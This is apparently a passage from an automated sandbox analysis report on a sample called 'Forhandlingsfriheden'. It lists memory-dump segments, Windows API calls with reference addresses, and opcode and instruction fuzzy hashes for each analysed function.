                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                            • Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
                                                                            • Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                            • Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                            • Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
                                                                            • Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                            • Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401C30
                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree
                                                                            • String ID: 32079
                                                                            • API String ID: 3394109436-2447952077
                                                                            • Opcode ID: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                                                            • Instruction ID: b885d26f68b874ad9ff9a305e80acb85bda866dca5011e4f065ba1a91b1516cf
                                                                            • Opcode Fuzzy Hash: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                                                            • Instruction Fuzzy Hash: 09218473904610ABD730ABA4DE85A6E72A4AB04328715053FF952B32D4C6BCE8919B5D
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024FA
                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 0040253A
                                                                            • RegCloseKey.ADVAPI32(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402622
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValuelstrlen
                                                                            • String ID:
                                                                            • API String ID: 2655323295-0
                                                                            • Opcode ID: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
                                                                            • Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
                                                                            • Opcode Fuzzy Hash: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
                                                                            • Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668
                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                            • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                            • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                            • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 004056A9
                                                                              • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeMessageSendUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2896919175-0
                                                                            • Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                            • Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
                                                                            • Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                            • Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableShow
                                                                            • String ID:
                                                                            • API String ID: 1136574915-0
                                                                            • Opcode ID: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                                                            • Instruction ID: cc057469d20fee5af05168c8280afa7b014ceb16d0f4b1b408cb009327ac905f
                                                                            • Opcode Fuzzy Hash: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                                                            • Instruction Fuzzy Hash: 7BE04876908610DFE754EBA4AE495EE73B4EF80365B10097FE001F11D1D7B94D00975D
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                            • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3712363035-0
                                                                            • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                            • Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
                                                                            • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                            • Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                            • Instruction ID: ad827bfb45cde9ed8aa1bf7c1acfcc20c377366860c5f8f00bfddef7402fec92
                                                                            • Opcode Fuzzy Hash: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                            • Instruction Fuzzy Hash: 52E04F72B11114ABCB18CBA8EDD086E73B6AB54310350453FD502B36A4CA759C418B58
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                              • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                              • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
                                                                              • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                            • Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
                                                                            • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                            • Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                            • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                            • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                            • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                            • Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
                                                                            • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                            • Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694
                                                                            APIs
